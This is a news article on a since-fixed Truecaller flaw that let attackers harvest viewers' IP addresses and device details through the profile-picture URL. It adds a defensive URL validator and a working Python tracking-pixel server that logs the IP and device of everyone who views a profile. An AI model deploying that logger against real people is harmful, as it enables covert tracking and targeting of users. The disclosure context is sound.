Truecaller has fixed a flaw that let attackers use one of the service's APIs to set the URL of their profile picture to a link pointing at a server they controlled. Because the app of anyone who viewed that profile then fetched the picture from the attacker's server, the attacker could harvest the IP addresses of other Truecaller users and, with that information, scan their addresses for open ports or target them with brute-force or distributed denial of service (DDoS) attacks. To attack a Truecaller user, a malicious party only had to get that user to view the booby-trapped profile.
The flaw existed in one of the APIs of Truecaller that allowed attackers to place their malicious links as the URL for a profile picture. Bengaluru-based security researcher Ehraz Ahmed discovered the Truecaller flaw and showed a proof-of-concept (PoC) to Gadgets 360. Upon confirming the exploit was real, Gadgets 360 brought the flaw to Truecaller's attention and connected the company with the researcher. We then responsibly waited until the company had fixed the issue before publishing this article.
Attackers leveraging the flaw could fetch the IP addresses of users who viewed their profile and silently obtain their approximate location (via IP geolocation) as well as device details. Because the flaw was in the API rather than in any one client, it could be exploited against users of every version of Truecaller, including Android, iOS, and the Web.
With an IP address and the other data in hand, an attacker could track the locations of users viewing the profile. The attacker could also scan the harvested addresses for open ports and then go after any exposed services with brute-force or DDoS attacks.
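The root cause is that the profile API stored whatever picture URL the caller supplied. The following is an added illustration, not Truecaller's code (the article does not say how the bug was fixed): a server-side check that only accepts URLs on the service's own image host, and the preferable design of storing an opaque object key and building the URL server-side. The CDN host, key format and function names are assumptions.

```python
# Added example, not Truecaller's code: validate a caller-supplied profile
# picture URL on the server so it can only reference the service's own image
# host, and (better) derive the URL from a storage key instead of storing a URL.
# The CDN host, key format and function names are assumptions for illustration.
import re
from urllib.parse import urlsplit, urlunsplit

PICTURE_HOST = "images.example-cdn.test"            # constructed CDN host
PICTURE_HOSTS = {PICTURE_HOST}                      # allowlist of image hosts
_KEY_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(?:jpg|png)$")


def validate_picture_url(url):
    """Return (True, canonical_url) or (False, reason) for a user-supplied URL."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    if parts.scheme != "https":
        return False, "scheme must be https"
    if parts.username is not None or parts.password is not None:
        # Blocks "https://images.example-cdn.test@attacker.test/..." tricks.
        return False, "userinfo not allowed"
    host = (parts.hostname or "").lower()
    if host not in PICTURE_HOSTS:
        return False, f"host {host!r} not in allowlist"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in (None, 443):
        return False, "non-standard port"
    if not parts.path.startswith("/"):
        return False, "path required"
    # Drop query and fragment so a stored URL cannot carry attacker-chosen data.
    return True, urlunsplit(("https", host, parts.path, "", ""))


def picture_url_for(object_key):
    """Preferred design: the client uploads an image and the server stores only
    an opaque object key; the URL is built server-side from that key, so there
    is no user-controlled URL field at all."""
    if not _KEY_RE.match(object_key):
        raise ValueError("invalid picture key")
    return f"https://{PICTURE_HOST}/profile/{object_key}"
```

The allowlist check is the minimum; the second function is the shape a profile-picture API should have had in the first place, since a URL that never came from the user cannot point at the user's infrastructure.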
"Whenever a user views the attacker's profile on Truecaller -- either by doing a search or tapping the pop-up from a call, the custom script gets executed and user's IP address gets recorded," explains Ahmed, adding that the user wouldn't notice any difference as the profile URL is not displayed publicly.
To demonstrate the flaw, Ahmed developed the PoC, which records the IP addresses of users in a log file. The custom PHP script the researcher used handled both IPv4 and IPv6 addresses. Gadgets 360 was also able to verify the scope of the vulnerability by testing it with multiple Android and iPhone models. The script captured the IP address of each device along with its model number and software version.
If a user looks up a Truecaller profile from a desktop browser, the flaw could also reveal browser details to the attacker. To showcase the extent of the flaw, Ahmed has created a video and published a case study.
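The mechanism Ahmed describes, as an added example that is not the researcher's PHP PoC: a minimal Python endpoint that serves a blank image and logs the requester's IP address (IPv4 or IPv6) together with the device model, OS version or browser that the User-Agent header reveals. The log file name, the User-Agent patterns and the sample requests in the comments are constructed for illustration.

```python
"""Added example (not the researcher's PHP PoC): an image-serving endpoint that
records the requester's IP address and User-Agent, which is what a profile
picture URL pointing at attacker-controlled infrastructure leaks when a client
fetches the image. Log file name, UA patterns and sample inputs are constructed."""
import ipaddress
import json
import re
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer

# 1x1 transparent GIF so the client renders a valid (blank) picture.
PIXEL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!"
             b"\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
             b"\x00\x02\x02D\x01\x00;")

# Crude User-Agent fingerprints (constructed) of the kind the article says the
# PoC surfaced: model and OS version on mobile, browser on desktop.
_UA_RULES = [
    ("Android", re.compile(r"Android (?P<version>[\d.]+); (?P<model>[^;)]+)")),
    ("iOS", re.compile(r"(?P<model>iPhone|iPad)[^;]*; CPU [\w ]*OS (?P<version>[\d_]+)")),
    ("Desktop", re.compile(r"(?P<model>Windows NT|Macintosh|X11)[^)]*\) .*?"
                           r"(?P<version>(?:Chrome|Firefox|Safari)/[\d.]+)")),
]


def build_record(remote_addr, headers):
    """Turn one image request into the log entry an attacker would keep.

    Handles IPv4 and IPv6, unwraps IPv4-mapped IPv6 addresses seen on a
    dual-stack listener, and prefers X-Forwarded-For behind a reverse proxy.
    """
    xff = headers.get("X-Forwarded-For", "")
    candidate = xff.split(",")[0].strip() if xff else remote_addr
    try:
        ip = ipaddress.ip_address(candidate)
    except ValueError:
        ip = ipaddress.ip_address(remote_addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    ua = headers.get("User-Agent", "")
    platform, model, version = "Unknown", None, None
    for name, rule in _UA_RULES:
        m = rule.search(ua)
        if m:
            platform = name
            model = m.group("model").strip()
            version = m.group("version").replace("_", ".")
            break
    return {"ip": str(ip), "ip_version": ip.version, "platform": platform,
            "model": model, "version": version, "user_agent": ua}


class PixelHandler(BaseHTTPRequestHandler):
    LOG_PATH = "views.log"  # constructed log file name

    def do_GET(self):
        record = build_record(self.client_address[0], self.headers)
        with open(self.LOG_PATH, "a") as fh:
            fh.write(json.dumps(record) + "\n")
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL_GIF)))
        self.send_header("Cache-Control", "no-store")  # force a fetch on every view
        self.end_headers()
        self.wfile.write(PIXEL_GIF)


class DualStackServer(HTTPServer):
    # Bind IPv6 "::"; on a dual-stack host IPv4 clients then arrive as
    # IPv4-mapped IPv6 addresses, which build_record unwraps.
    address_family = socket.AF_INET6


if __name__ == "__main__":
    DualStackServer(("::", 8080), PixelHandler).serve_forever()
```

The viewer sees nothing unusual: the response is a valid image, and the only trace is the HTTP request the client made in order to display the profile picture. The same request carries the User-Agent that exposes model and software version on phones and browser details on desktops.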
"It was recently brought to our attention that there was a small bug in our app services which allowed the modification of one's own profile in an unintended way," Truecaller said in a statement to Gadgets 360. "We thank the security researcher for bringing this to our notice and collaborating with us. The bug was immediately fixed."
Truecaller also revealed that it is set to launch a bug bounty programme to reward security researchers reporting flaws in its system in the future.
"We, at Truecaller, are humbled to welcome all contributions from the security research community. We have partnered with a community of researchers and will shortly announce a bounty program where we, as a transparent and responsible organisation, will also reward researchers for their contributions," the company stated.
As of September this year, Truecaller has over 150 million daily active users globally. The Truecaller app also earlier this year crossed the mark of 500 million downloads and surpassed the milestone of one million Premium subscribers worldwide.
Truecaller is best known for its caller ID and call-blocking features, but the app also offers Voice-over-Internet-Protocol (VoIP) calling and a UPI-based payments service positioned against WhatsApp. In April, Truecaller also tied up with Bengaluru-headquartered RedBus to offer bus ticket booking to its users in India.